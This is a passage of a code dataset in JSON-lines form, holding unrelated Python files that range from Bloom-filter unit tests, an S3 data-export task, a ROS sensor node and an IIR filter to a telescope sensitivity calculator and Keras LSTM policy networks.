\"\"\"\n self.env = {'GOPATH': self.find_gopaths()}\n\n # copy debug output from Linter.run()\n if persist.debug_mode():\n persist.printf('{}: {} {}'.format(self.name,\n os.path.basename(self.filename or ''),\n cmd or ''))\n\n return self.tmpfile(cmd, code, suffix=self.get_tempfile_suffix())\n","sub_path":"linter.py","file_name":"linter.py","file_ext":"py","file_size_in_byte":2292,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"607174371","text":"#!/usr/bin/env python\n\nimport unittest\nimport StringIO\n\nfrom rnabloom.utils import graph_utils as gu\nfrom rnabloom.bloom import bloom_filters as bf\n\nclass NumBitsTestCase(unittest.TestCase):\n def setUp(self):\n pass\n #enddef\n \n def test_get_num_bits(self):\n self.assertEqual(8000, gu._get_num_bits('1k'))\n self.assertEqual(8000000, gu._get_num_bits('1M'))\n self.assertEqual(8000000000, gu._get_num_bits('1G'))\n self.assertEqual(8000000000000, gu._get_num_bits('1T'))\n #enddef\n#endclass\n\nclass NumNeighborsTestCase(unittest.TestCase):\n def setUp(self):\n self.bloomfilter = bf.EvenLengthBloomFilter(8000)\n # populate the bf\n self.bloomfilter.add('TACAAA') # predecessor 1\n self.bloomfilter.add('GACAAA') # predecessor 2\n self.bloomfilter.add('ACAAAG')\n self.bloomfilter.add('CAAAGT') # successor 1\n self.bloomfilter.add('CAAAGG') # successor 2\n #enddef\n\n def test_count_predecessors(self):\n self.assertEqual(2, gu._count_predecessors('ACAAAG', self.bloomfilter, strand_specific=True))\n #enddef\n \n def test_count_successors(self):\n self.assertEqual(2, gu._count_successors('ACAAAG', self.bloomfilter, strand_specific=True))\n #enddef\n#endclass\n\nclass PopulateBloomFiltersTestCase(unittest.TestCase):\n def setUp(self):\n self.l1_bf = bf.BloomFilter(8000, 4)\n # populate the bf\n self.l1_bf.add('TACAAA') # predecessor 1\n self.l1_bf.add('GACAAA') # predecessor 2\n self.l1_bf.add('ACAAAG')\n self.l1_bf.add('CAAAGT') # successor 1\n self.l1_bf.add('CAAAGG') # successor 2 \n \n self.l2_bf = bf.EvenLengthBloomFilter(8000)\n # populate the bf\n self.l2_bf.add('TACAAA') # predecessor 1\n self.l2_bf.add('GACAAA') # predecessor 2\n self.l2_bf.add('ACAAAG')\n self.l2_bf.add('CAAAGT') # successor 1\n self.l2_bf.add('CAAAGG') # successor 2\n #enddef\n \n def test_populate_bloom_filters_forward(self):\n lines = ['>1', 'TTTTACAAA', '>2', 'TTTTACAAA']\n stream = StringIO.StringIO('\\n'.join(lines))\n \n gu._populate_bloom_filters(stream, forward=True, k=6, strand_specific=True,\n screening_bf=self.l1_bf, evenlength_bf=self.l2_bf,\n initial_blunt_kmers=set(), blunt_kmers=set(), branch_kmers=set())\n\n self.assertTrue(self.l1_bf.lookup('TTTTAC'))\n self.assertTrue(self.l1_bf.lookup('TTTACA'))\n self.assertTrue(self.l1_bf.lookup('TTACAA'))\n self.assertTrue(self.l1_bf.lookup('TACAAA'))\n \n self.assertTrue(self.l2_bf.lookup('TTTTAC'))\n self.assertTrue(self.l2_bf.lookup('TTTACA'))\n self.assertTrue(self.l2_bf.lookup('TTACAA'))\n self.assertTrue(self.l2_bf.lookup('TACAAA'))\n #enddef\n \n def test_populate_bloom_filters_backward(self):\n lines = ['>1', 'TTTTACAAA', '>2', 'TTTTACAAA']\n stream = StringIO.StringIO('\\n'.join(lines))\n \n gu._populate_bloom_filters(stream, forward=False, k=6, strand_specific=True,\n screening_bf=self.l1_bf, evenlength_bf=self.l2_bf,\n initial_blunt_kmers=set(), blunt_kmers=set(), branch_kmers=set())\n \n self.assertTrue(self.l1_bf.lookup('GTAAAA'))\n self.assertTrue(self.l1_bf.lookup('TGTAAA'))\n self.assertTrue(self.l1_bf.lookup('TTGTAA'))\n 
self.assertTrue(self.l1_bf.lookup('TTTGTA'))\n \n self.assertTrue(self.l2_bf.lookup('GTAAAA'))\n self.assertTrue(self.l2_bf.lookup('TGTAAA'))\n self.assertTrue(self.l2_bf.lookup('TTGTAA'))\n self.assertTrue(self.l2_bf.lookup('TTTGTA'))\n #enddef\n#endclass\n\nclass MakeDBGTestCase(unittest.TestCase):\n def setUp(self):\n self.seq1 = 'ATCGGTCGGAGACCCTTTAGCTTTAG'\n self.seq2 = 'ATCGGTCGGTTACCCTTTAGCTTTAG'\n self.lines = ['>1', self.seq1,\n '>2', self.seq2,\n '>3', self.seq1,\n '>4', self.seq2]\n self.k10_ctgs = set(['ATCGGTCGGAGACCCTTTAG',\n 'ATCGGTCGGTTACCCTTTAG',\n 'ACCCTTTAGCTTTAG'])\n #enddef\n \n def test_assembly(self):\n bfdbg = gu.make_2k_bf_dbg(fastq1_stream=StringIO.StringIO('\\n'.join(self.lines)), fastq2_stream=None, forward1=True, forward2=False, k=10, strand_specific=True, screening_bf_size='10M', dbg_bf_size='50M')\n \n \"\"\"\n print 'seq 1: '+ self.seq1\n print 'seq 2: '+ self.seq2\n print 'tips: '+ str(bfdbg.blunt_kmers)\n print 'branches: '+ str(bfdbg.branch_kmers)\n print 'cycles?: '+ str(bfdbg.initial_blunt_kmers)\n \"\"\"\n \n assembled_seqs = set()\n for ctg in gu.assemble_unambiguous_paths(bfdbg, screening_bf_size='10M'):\n assembled_seqs.add(ctg.split('\\n')[1])\n #endfor\n \n self.assertEqual(assembled_seqs, self.k10_ctgs)\n #enddef\n#endclass\n\nif __name__ == \"__main__\":\n unittest.main()\n#endif\n","sub_path":"tests/test_utils/test_graph_utils.py","file_name":"test_graph_utils.py","file_ext":"py","file_size_in_byte":5036,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"510248746","text":"from __future__ import absolute_import\nfrom __future__ import unicode_literals\nimport logging\nimport unicodecsv\nimport io\nimport boto3\nimport re\nimport dpath.util\nfrom collections import OrderedDict\nfrom .. 
import API, env\nfrom ..time import Time\n\nSCHOOL_SYNC_SKIP_FIELDS = (\n 'created',\n 'creator',\n 'description',\n 'id',\n 'name',\n 'organizationType',\n 'pending',\n 'schoolType',\n)\n\nEXPEDITION_EXPORT_KEY = 'reports/expeditions-full.tsv'\nEXPEDITION_DATA_EXPORT_FIELDS = [\n '_id',\n 'monitoringStartDate',\n 'name',\n 'team.schoolOrg.name',\n 'team.name',\n 'station.name',\n 'protocols.siteCondition.meteorologicalConditions.airTemperatureC',\n 'protocols.siteCondition.meteorologicalConditions.weatherConditions',\n 'protocols.siteCondition.meteorologicalConditions.windSpeedMPH',\n 'protocols.siteCondition.meteorologicalConditions.windDirection',\n 'protocols.siteCondition.humidity',\n 'protocols.siteCondition.recentRainfall.rainedIn24Hours',\n 'protocols.siteCondition.recentRainfall.rainedIn72Hours',\n 'protocols.siteCondition.recentRainfall.rainedIn7Days',\n 'protocols.siteCondition.tideConditions.referencePoint',\n 'protocols.siteCondition.tideConditions.tidalCurrent',\n 'protocols.siteCondition.tideConditions.closestHighTideHeight',\n 'protocols.siteCondition.tideConditions.closestHighTide',\n 'protocols.siteCondition.tideConditions.closestLowTideHeight',\n 'protocols.siteCondition.tideConditions.closestLowTide',\n 'protocols.siteCondition.waterConditions.surfaceCurrentSpeedMPS',\n 'protocols.siteCondition.waterConditions.oilSheen',\n 'protocols.siteCondition.waterConditions.garbage.garbagePresent',\n 'protocols.siteCondition.pipes',\n 'protocols.siteCondition.landConditions.shoreLineType',\n 'protocols.siteCondition.landConditions.garbage.garbagePresent',\n 'protocols.siteCondition.landConditions.shorelineSurfaceCoverEstPer.imperviousSurfacePer',\n 'protocols.siteCondition.landConditions.shorelineSurfaceCoverEstPer.perviousSurfacePer',\n 'protocols.siteCondition.landConditions.shorelineSurfaceCoverEstPer.vegetatedSurfacePer',\n 'protocols.oysterMeasurement.depthOfOysterCage.submergedDepthofCageM',\n 'protocols.oysterMeasurement.conditionOfOysterCage.bioaccumulationOnCage',\n 'protocols.oysterMeasurement.conditionOfOysterCage.notesOnDamageToCage',\n 'protocols.oysterMeasurement.maximumSizeOfAllLiveOysters',\n 'protocols.oysterMeasurement.minimumSizeOfAllLiveOysters',\n 'protocols.mobileTrap.organism',\n 'protocols.settlementTiles.*.grid*.organism',\n 'protocols.waterQuality.depth',\n 'protocols.waterQuality.temperature',\n 'protocols.waterQuality.dissolvedOxygen',\n 'protocols.waterQuality.salinity',\n 'protocols.waterQuality.ph',\n 'protocols.waterQuality.turbidity',\n 'protocols.waterQuality.ammonia',\n 'protocols.waterQuality.nitrates',\n 'protocols.waterQuality.other',\n]\n\n\ndef sync_prospective_to_orgs():\n \"\"\"\n Synchronizes certain fields from the \"prospectiveorgs\" table into the corresponding records in\n the \"schoolorgs\" table. 
This process allows changes made to prospectiveorgs by other\n processes (e.g.: syncing from third-party data sources) to propagate to existing organizations.\n \"\"\"\n instance = API('bop-worker')\n schoolOrgs = instance.db.collection('schoolorgs')\n prospectiveOrgs = instance.db.collection('prospectiveorgs')\n\n # for each school-org in the database...\n for school in schoolOrgs.query('all', limit=False):\n if school.syncId:\n has_changed = False\n\n prospectiveOrg = prospectiveOrgs.query('syncId/{}'.format(school.syncId), limit=1)\n\n for k, v in school.items():\n if k in SCHOOL_SYNC_SKIP_FIELDS:\n continue\n\n if k in prospectiveOrg:\n if school[k] != prospectiveOrg[k]:\n has_changed = True\n school[k] = prospectiveOrg[k]\n\n if has_changed:\n logging.info('Synced: {} ({})'.format(school.id, school.name))\n schoolOrgs.update(school)\n else:\n logging.info('Unchanged: {}'.format(school.id))\n\n\ndef generate_batch_expeditions_tsv():\n api = API('bop-worker')\n api.setup()\n s3 = boto3.client('s3')\n\n bucket = env.get_reports_bucket()\n s3.head_bucket(Bucket=bucket)\n\n data = []\n\n expeditions = api.db.collection('expeditions').query(\n 'status/published',\n limit=False,\n sort=['monitoringStartDate']\n )\n\n teams = dict([\n (record.id, dict(record)) for record in api.db.collection('teams').all(\n limit=False\n )\n ])\n\n stations = dict([\n (record.id, dict(record)) for record in api.db.collection('restorationstations').all(\n limit=False\n )\n ])\n\n organizations = dict([\n (record.id, dict(record)) for record in api.db.collection('schoolorgs').all(\n limit=False\n )\n ])\n\n p1siteConditions = dict([\n (record.id, dict(record)) for record in api.db.collection('protocolsiteconditions').all(\n limit=False\n )\n ])\n\n p2oysterMeasurements = dict([\n (record.id, dict(record)) for record in api.db.collection('protocoloystermeasurements').all(\n limit=False\n )\n ])\n\n p3mobileTraps = dict([\n (record.id, dict(record)) for record in api.db.collection('protocolmobiletraps').all(\n limit=False\n )\n ])\n\n p4settlementTiles = dict([\n (record.id, dict(record)) for record in api.db.collection('protocolsettlementtiles').all(\n limit=False\n )\n ])\n\n p5waterQuality = dict([\n (record.id, dict(record)) for record in api.db.collection('protocolwaterqualities').all(\n limit=False\n )\n ])\n\n prefixes = {\n 'team': teams,\n 'station': stations,\n 'team.schoolOrg': organizations,\n 'protocols.siteCondition': p1siteConditions,\n 'protocols.oysterMeasurement': p2oysterMeasurements,\n 'protocols.mobileTrap': p3mobileTraps,\n 'protocols.settlementTiles': p4settlementTiles,\n 'protocols.waterQuality': p5waterQuality,\n }\n\n for expedition in expeditions:\n record = OrderedDict()\n expeditionDict = dict(expedition)\n\n for field in EXPEDITION_DATA_EXPORT_FIELDS:\n try:\n if field == '_id':\n record['_id'] = expedition.id\n\n elif field == 'team.schoolOrg.name':\n team = teams[expeditionDict['team']]\n org = organizations[team['schoolOrg']]\n record[field] = org['name']\n\n elif '.' 
not in field:\n record[field] = expedition.get(field)\n\n else:\n for prefix, results in prefixes.items():\n results = prefixes[prefix]\n trimmedPrefix = re.sub(r'^{}\\.'.format(prefix), '', field)\n\n if field.startswith(prefix + '.'):\n subItemId = dpath.util.get(expeditionDict, prefix, separator='.')\n\n if not subItemId:\n subItemId = dpath.util.get(record, prefix, separator='.')\n\n try:\n nestedDataItem = results[subItemId]\n except KeyError:\n nestedDataItem = None\n\n if not nestedDataItem:\n nestedDataItem = {}\n\n if len(nestedDataItem):\n record[field] = dpath.util.get(\n nestedDataItem,\n trimmedPrefix,\n separator='.'\n )\n\n except KeyError:\n pass\n\n if field not in record:\n record[field] = None\n\n data.append(record)\n\n output = io.BytesIO()\n writer = unicodecsv.DictWriter(\n output,\n fieldnames=EXPEDITION_DATA_EXPORT_FIELDS,\n dialect='excel-tab'\n )\n\n writer.writeheader()\n\n for record in data:\n writer.writerow(record)\n\n output.seek(0)\n\n # upload the exported file, overwriting the existing copy\n s3.put_object(\n ACL='public-read',\n Bucket=bucket,\n Key=EXPEDITION_EXPORT_KEY,\n ContentType='text/tab-separated-values',\n StorageClass='REDUCED_REDUNDANCY',\n Body=output,\n Metadata={\n 'GeneratedAt': '{}'.format(Time()),\n },\n )\n","sub_path":"backend/bop/tasks/data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":8892,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"442604395","text":"#!/usr/bin/env python\nimport rospy\nimport random\nfrom std_msgs.msg import UInt16\nfrom std_msgs.msg import Float32\n\n# This node \"left_error_node\" subscribes to the left IR sensor, converts that value \n# to a measurement in inches. Then it publishes the error found from the desired \n# minimum to the topic \"left_error\".\n\n# function: left_ir_to_error\n# purpose:\n# 1) Read in values from the left ir publishers \"left_ir\".\n# 2) Convert that value to a inches measurment using converts ir to in float 5357.5113406476 x^(-1.0171714166).\n# 3) Subtract that measurement from the minimum which will be 12 inches. If the subtraction shows\n# the value to be greater than 0 coerce it to 0. Regardless add 1.\n# 4) Take the inverse and bring it to some power, I think 1 will work for now.\n\ndef left_ir_to_error(data):\n min_distance = 12\n # value from sensor\n sensor_read = data.data\n # if the value read in was a 0 will set the effort small by making a large read value\n left_ir_read = 0\n if sensor_read > 0:\n # reading and convertin the value\n left_ir_read = 5357.5113406746*pow(sensor_read,-1.0171714166)\n else:\n left_ir_read = 1000\n # coercing the value if it is less than the minimum\n if min_distance > left_ir_read:\n left_ir_read = min_distance\n # taking the inverse\n left_ir_read = 1.0/(-pow(abs(min_distance - left_ir_read - 1),1/(0.5 + random.random())))\n # publishing the result\n errorL.publish(left_ir_read)\n\n# function: start\n# purpose:\n# 1) Initialize the global variable for the publisher\n# 2) Initialize the publisher and set the topic name for the publisher to \"left_error\"\n# this value will be of the Float32 type, and set the que size to 10\n# 3) Initialize the node publishing the topic \"left_error\". 
The node's name is \"left_error_node\".\n# 4) Set the update rate to be the same as the rate information is coming in.\ndef start():\n # erroL is the publisher\n global errorL\n # errorL is the publishing node\n errorL = rospy.Publisher('left_error', Float32, queue_size=10)\n # starting the node \n rospy.init_node('left_error_node',anonymous=True)\n # subscribing to the left ir topic\n rospy.Subscriber('left_ir', UInt16, left_ir_to_error)\n rospy.spin()\n\nif __name__ == '__main__':\n try:\n start()\n except rospy.ROSInterruptException:\n pass\n\n","sub_path":"scripts/left_side_error_v1.py","file_name":"left_side_error_v1.py","file_ext":"py","file_size_in_byte":2356,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"92940571","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Mar 31 12:30:58 2018\n\n@author: Saul\n\"\"\"\n\n# -*- coding:utf-8 -*-\n# class TreeNode:\n# def __init__(self, x):\n# self.val = x\n# self.left = None\n# self.right = None\nclass Solution:\n # 返回对应节点TreeNode\n def __init__(self):\n self.orderres = []\n\n def Inorder(self, pRoot):\n if not pRoot:\n return\n self.Inorder(pRoot.left)\n self.orderres.append(pRoot)\n self.Inorder(pRoot.right)\n \n def KthNode(self, pRoot, k):\n # write code here\n if not pRoot or k <= 0:\n return None\n self.Inorder(pRoot)\n if k > len(self.orderres):\n return None\n return self.orderres[k-1]","sub_path":"comeonoffer/二叉搜索树的第k大结点.py","file_name":"二叉搜索树的第k大结点.py","file_ext":"py","file_size_in_byte":751,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"40092901","text":"import time\nfrom datetime import date\n\n\noptionArr = {\n\t\"one-million\": 1000000,\n\t\"five-million\": 5000000,\n\t\"ten-million\": 10000000,\n\t\"one-billion\": 1000000000,\n\t\"five-billion\": 5000000000,\n\t\"ten-billion\": 10000000000\n};\n\noption = 0;\n\ndef setup():\n\toption = input(\"\"\"Please enter an option?\n\"\"\")\n\toptionArrIndexes = [\"one-million\", \"five-million\", \"ten-million\", \"hundred-million\", \"one-billion\", \"ten-billion\"]\n\tif option in optionArrIndexes:\n\t\treturn optionArr[option]\n\telse:\n\t\tprint(\"Invalid Argument passed. Allowed values are one-thousand|one-million|ten-million|one-billion|ten-billion\")\n\t\texit()\n","sub_path":"python/loops/multitasking/commonvalidator.py","file_name":"commonvalidator.py","file_ext":"py","file_size_in_byte":601,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"592854466","text":"#\n# Copyright © 2020 United States Government as represented by the Administrator\n# of the National Aeronautics and Space Administration. No copyright is claimed\n# in the United States under Title 17, U.S. Code. All Other Rights Reserved.\n#\n# SPDX-License-Identifier: NASA-1.3\n#\n\"\"\"Dorado sensitivity calculator\"\"\"\nfrom astropy.stats import signal_to_noise_oir_ccd\nfrom astropy import units as u\nimport numpy as np\nfrom synphot.exceptions import SynphotError\nfrom synphot import Observation\n\nfrom . import backgrounds\nfrom . import bandpasses\nfrom . 
import constants\n\n__all__ = ('get_snr', 'get_limmag', 'get_exptime')\n\n\ndef _get_count_rate(source_spectrum):\n observation = Observation(source_spectrum, bandpasses.NUV_D)\n try:\n return observation.countrate(constants.AREA) / u.ct\n except SynphotError as e:\n if e.args[0] == 'Integrated flux is infinite':\n return np.inf * u.s**-1\n else:\n raise\n\n\ndef get_snr(source_spectrum, *, exptime, coord, time, night):\n \"\"\"Calculate the SNR of an observation of a point source with Dorado.\n\n Parameters\n ----------\n source_spectrum : synphot.SourceSpectrum\n The spectrum of the source.\n exptime : astropy.units.Quantity\n The exposure time\n coord : astropy.coordinates.SkyCoord\n The coordinates of the source, for calculating zodiacal light\n time : astropy.time.Time\n The time of the observation, for calculating zodiacal light\n night : bool\n Whether the observation occurs on the day or night side of the Earth,\n for estimating airglow\n\n Returns\n -------\n float\n The signal to noise ratio\n \"\"\"\n return signal_to_noise_oir_ccd(\n exptime,\n constants.APERTURE_CORRECTION * _get_count_rate(source_spectrum),\n (\n _get_count_rate(backgrounds.get_zodiacal_light(coord, time)) +\n _get_count_rate(backgrounds.get_airglow(night))\n ),\n constants.DARK_NOISE,\n constants.READ_NOISE,\n constants.NPIX\n ).to_value(u.dimensionless_unscaled)\n\n\ndef _amp_for_signal_to_noise_oir_ccd(\n snr, t, source_eps, sky_eps, dark_eps, rd, npix, gain=1.0):\n \"\"\"Inverse of astropy.stats.signal_to_noise_oir_ccd.\"\"\"\n signal = t * source_eps * gain\n # noise squared without signal shot noise term\n snr2 = np.square(snr)\n noise2 = t * (npix * (sky_eps * gain + dark_eps)) + npix * np.square(rd)\n return 0.5 * snr2 / signal * (1 + np.sqrt(1 + 4 * noise2 / snr2))\n\n\ndef get_limmag(source_spectrum, *, snr, exptime, coord, time, night):\n \"\"\"Get the limiting magnitude for a given SNR.\n\n Parameters\n ----------\n source_spectrum : synphot.SourceSpectrum\n The spectrum of the source.\n snr : float\n The desired SNR.\n exptime : astropy.units.Quantity\n The exposure time\n coord : astropy.coordinates.SkyCoord\n The coordinates of the source, for calculating zodiacal light\n time : astropy.time.Time\n The time of the observation, for calculating zodiacal light\n night : bool\n Whether the observation occurs on the day or night side of the Earth,\n for estimating airglow\n\n Returns\n -------\n astropy.units.Quantity\n The AB magnitude of the source\n \"\"\"\n mag0 = Observation(source_spectrum, bandpasses.NUV_D).effstim(\n u.ABmag, area=constants.AREA)\n\n result = _amp_for_signal_to_noise_oir_ccd(\n snr,\n exptime,\n constants.APERTURE_CORRECTION * _get_count_rate(source_spectrum),\n (\n _get_count_rate(backgrounds.get_zodiacal_light(coord, time)) +\n _get_count_rate(backgrounds.get_airglow(night))\n ),\n constants.DARK_NOISE,\n constants.READ_NOISE,\n constants.NPIX\n ).to_value(u.dimensionless_unscaled)\n\n return -2.5 * np.log10(result) * u.mag + mag0\n\n\ndef _exptime_for_signal_to_noise_oir_ccd(\n snr, source_eps, sky_eps, dark_eps, rd, npix, gain=1.0):\n \"\"\"Inverse of astropy.stats.signal_to_noise_oir_ccd.\"\"\"\n c1 = source_eps * gain\n c2 = npix * (sky_eps * gain + dark_eps)\n c3 = npix * np.square(rd)\n x = 1 + c2 / c1\n snr2 = np.square(snr)\n return 0.5 * snr2 / c1 * (x + np.sqrt(np.square(x) + 4 * c3 / snr2))\n\n\ndef get_exptime(source_spectrum, *, snr, coord, time, night):\n \"\"\"Calculate the SNR of an observation of a point source with Dorado.\n\n Parameters\n ----------\n 
source_spectrum : synphot.SourceSpectrum\n The spectrum of the source.\n snr : float\n The signal to noise ratio\n coord : astropy.coordinates.SkyCoord\n The coordinates of the source, for calculating zodiacal light\n time : astropy.time.Time\n The time of the observation, for calculating zodiacal light\n night : bool\n Whether the observation occurs on the day or night side of the Earth,\n for estimating airglow\n\n Returns\n -------\n astropy.units.Quantity\n The exposure time\n \"\"\"\n return _exptime_for_signal_to_noise_oir_ccd(\n snr,\n constants.APERTURE_CORRECTION * _get_count_rate(source_spectrum),\n (\n _get_count_rate(backgrounds.get_zodiacal_light(coord, time)) +\n _get_count_rate(backgrounds.get_airglow(night))\n ),\n constants.DARK_NOISE,\n constants.READ_NOISE,\n constants.NPIX\n )\n","sub_path":"dorado/sensitivity/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":5355,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"332683654","text":"import struct\n\n# !/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n\nimport numpy as np\nimport scipy.signal as signal\n\n# IIR2Filter comes from https://github.com/poganyg/IIR-filter\n\n\nclass IIR2Filter(object):\n\n def createCoeffs(self, order, cutoff, filterType, design='butter', rp=1, rs=1, fs=0):\n\n # defining the acceptable inputs for the design and filterType params\n self.designs = ['butter', 'cheby1', 'cheby2']\n self.filterTypes1 = ['lowpass', 'highpass', 'Lowpass', 'Highpass', 'low', 'high']\n self.filterTypes2 = ['bandstop', 'bandpass', 'Bandstop', 'Bandpass']\n\n # Error handling: other errors can arise too, but those are dealt with\n # in the signal package.\n self.isThereAnError = 1 # if there was no error then it will be set to 0\n self.COEFFS = [0] # with no error this will hold the coefficients\n\n if design not in self.designs:\n print('Gave wrong filter design! Remember: butter, cheby1, cheby2.')\n elif filterType not in self.filterTypes1 and filterType not in self.filterTypes2:\n print('Gave wrong filter type! 
Remember: lowpass, highpass',\n ', bandpass, bandstop.')\n elif fs < 0:\n print('The sampling frequency has to be positive!')\n else:\n self.isThereAnError = 0\n\n # if fs was given then the given cutoffs need to be normalised to Nyquist\n if fs and self.isThereAnError == 0:\n for i in range(len(cutoff)):\n cutoff[i] = cutoff[i] / fs * 2\n\n if design == 'butter' and self.isThereAnError == 0:\n self.COEFFS = signal.butter(order, cutoff, filterType, output='sos')\n elif design == 'cheby1' and self.isThereAnError == 0:\n self.COEFFS = signal.cheby1(order, rp, cutoff, filterType, output='sos')\n elif design == 'cheby2' and self.isThereAnError == 0:\n self.COEFFS = signal.cheby2(order, rs, cutoff, filterType, output='sos')\n\n return self.COEFFS\n\n def __init__(self, order, cutoff, filterType, design='butter', rp=1, rs=1, fs=0):\n self.COEFFS = self.createCoeffs(order, cutoff, filterType, design, rp, rs, fs)\n self.acc_input = np.zeros(len(self.COEFFS))\n self.acc_output = np.zeros(len(self.COEFFS))\n self.buffer1 = np.zeros(len(self.COEFFS))\n self.buffer2 = np.zeros(len(self.COEFFS))\n self.input = 0\n self.output = 0\n\n def filter(self, input):\n\n # len(COEFFS[0,:] == 1 means that there was an error in the generation\n # of the coefficients and the filtering should not be used\n if len(self.COEFFS[0, :]) > 1:\n\n self.input = input\n self.output = 0\n\n # The for loop creates a chain of second order filters according to\n # the order desired. If a 10th order filter is to be created the\n # loop will iterate 5 times to create a chain of 5 second order\n # filters.\n for i in range(len(self.COEFFS)):\n self.FIRCOEFFS = self.COEFFS[i][0:3]\n self.IIRCOEFFS = self.COEFFS[i][3:6]\n\n # Calculating the accumulated input consisting of the input and\n # the values coming from the feedbaack loops (delay buffers\n # weighed by the IIR coefficients).\n self.acc_input[i] = (self.input + self.buffer1[i]\n * -self.IIRCOEFFS[1] + self.buffer2[i] * -self.IIRCOEFFS[2])\n\n # Calculating the accumulated output provided by the accumulated\n # input and the values from the delay bufferes weighed by the\n # FIR coefficients.\n self.acc_output[i] = (self.acc_input[i] * self.FIRCOEFFS[0]\n + self.buffer1[i] * self.FIRCOEFFS[1] + self.buffer2[i]\n * self.FIRCOEFFS[2])\n\n # Shifting the values on the delay line: acc_input->buffer1->\n # buffer2\n self.buffer2[i] = self.buffer1[i]\n self.buffer1[i] = self.acc_input[i]\n\n self.input = self.acc_output[i]\n\n self.output = self.acc_output[i]\n\n return self.output\n\n\nclass RealTimeProcessor(object):\n def __init__(self, time_step):\n self.time_step = time_step\n\n self.X = 0.0\n self.Y = 0.0\n self.Z = 0.0\n\n self.X_d = 0.0\n self.Y_d = 0.0\n self.Z_d = 0.0\n\n self.diff_X = Differentiator()\n self.diff_Y = Differentiator()\n self.diff_Z = Differentiator()\n\n self.QX = 0.0\n self.QY = 0.0\n self.QZ = 0.0\n self.QW = 1.0\n self.R11 = 1.0\n self.R12 = 0.0\n self.R13 = 0.0\n self.R21 = 0.0\n self.R22 = 1.0\n self.R23 = 0.0\n self.R31 = 0.0\n self.R32 = 0.0\n self.R33 = 1.0\n\n def step(self, udp_data):\n x, y, z, qx, qy, qz, qw = struct.unpack(\"hhhhhhh\", udp_data)\n # position\n self.X = x * 0.0005\n self.Y = y * 0.0005\n self.Z = z * 0.0005\n # velocity\n self.X_d = self.diff_X.step(self.X, self.time_step)\n self.Y_d = self.diff_Y.step(self.Y, self.time_step)\n self.Z_d = self.diff_Z.step(self.Z, self.time_step)\n # qaut\n self.QX = float(qx * 0.001)\n self.QY = float(qy * 0.001)\n self.QZ = float(qz * 0.001)\n self.QW = float(qw * 0.001)\n # qaut2rotm\n yy = 
self.QY * self.QY\n xx = self.QX * self.QX\n zz = self.QZ * self.QZ\n xy = self.QX * self.QY\n xz = self.QX * self.QZ\n yz = self.QY * self.QZ\n wx = self.QW * self.QX\n wy = self.QW * self.QY\n wz = self.QW * self.QZ\n self.R11 = 1 - 2 * (yy + zz)\n self.R12 = 2 * (xy - wz)\n self.R13 = 2 * (xz + wy)\n self.R21 = 2 * (xy + wz)\n self.R22 = 1 - 2 * (xx + zz)\n self.R23 = 2 * (yz - wx)\n self.R31 = 2 * (xz - wy)\n self.R32 = 2 * (yz + wx)\n self.R33 = 1 - 2 * (xx + yy)\n\n\nclass Differentiator(object):\n def __init__(self, data_delayed=0):\n self.data_delayed = data_delayed\n\n def step(self, data, time_step):\n temp_data_d = (data - self.data_delayed)/time_step\n self.data_delayed = data\n return temp_data_d\n","sub_path":"data_processor/GeneralFcn_2.py","file_name":"GeneralFcn_2.py","file_ext":"py","file_size_in_byte":6338,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"384750513","text":"import numpy as np\r\nfrom keras.models import Sequential\r\nfrom keras.layers import Activation, LSTM, Dense, BatchNormalization\r\nfrom keras.optimizers import sgd\r\nfrom keras.optimizers import Adam, nadam\r\nfrom keras.engine.input_layer import Input\r\nfrom keras import initializers, regularizers, constraints\r\nfrom keras.engine.topology import Layer\r\nfrom keras import optimizers\r\nfrom keras import backend as K\r\nfrom keras.layers import Dropout\r\nfrom keras.layers import Dense\r\nfrom keras import losses\r\n\r\nclass PolicyNetwork:\r\n def __init__(self, input_dim=0, output_dim=0, lr=0.01):\r\n self.input_dim = input_dim\r\n self.lr = lr\r\n # LSTM 신경망\r\n self.model = Sequential()\r\n\r\n self.model.add(LSTM(128, input_shape=(1, input_dim), return_sequences=True, stateful=False, dropout=0.5, activation='relu'))\r\n self.model.add(BatchNormalization())\r\n self.model.add(Attention(1)) ### ATTENTION\r\n self.model.add(Dense(32, activation='relu'))\r\n self.model.add(Dropout(0.5))\r\n self.model.add(Dense(2, activation=\"softmax\"))\r\n\r\n #self.model.compile(optimizer=Adam(lr=lr), loss='mse')\r\n nadam = optimizers.nadam(lr=0.01, beta_1=0.9, beta_2=0.999)\r\n self.model.compile(loss='mean_squared_error', optimizer=nadam)\r\n #self.model.compile(optimizer=Adam(lr=lr,beta_1=0.9, beta_2=0.999, amsgrad=True), loss='mse')\r\n\r\n\r\n self.prob = None\r\n\r\n def reset(self):\r\n self.prob = None\r\n\r\n def predict(self, sample):\r\n self.prob = self.model.predict(np.array(sample).reshape((1, -1, self.input_dim)))[0]\r\n return self.prob\r\n\r\n def train_on_batch(self, x, y):\r\n return self.model.train_on_batch(x, y)\r\n\r\n def save_model(self, model_path):\r\n if model_path is not None and self.model is not None:\r\n self.model.save_weights(model_path, overwrite=True)\r\n\r\n def load_model(self, model_path):\r\n if model_path is not None:\r\n self.model.load_weights(model_path)\r\n\r\n\r\nclass PolicyNetwork1: #### 원래 모델\r\n def __init__(self, input_dim=0, output_dim=0, lr=0.01):\r\n self.input_dim = input_dim\r\n self.lr = lr\r\n\r\n # LSTM 신경망\r\n self.model = Sequential()\r\n\r\n self.model.add(LSTM(256, input_shape=(1, input_dim),\r\n return_sequences=True, stateful=False, dropout=0.5))\r\n self.model.add(BatchNormalization())\r\n self.model.add(LSTM(256, return_sequences=True, stateful=False, dropout=0.5))\r\n self.model.add(BatchNormalization())\r\n 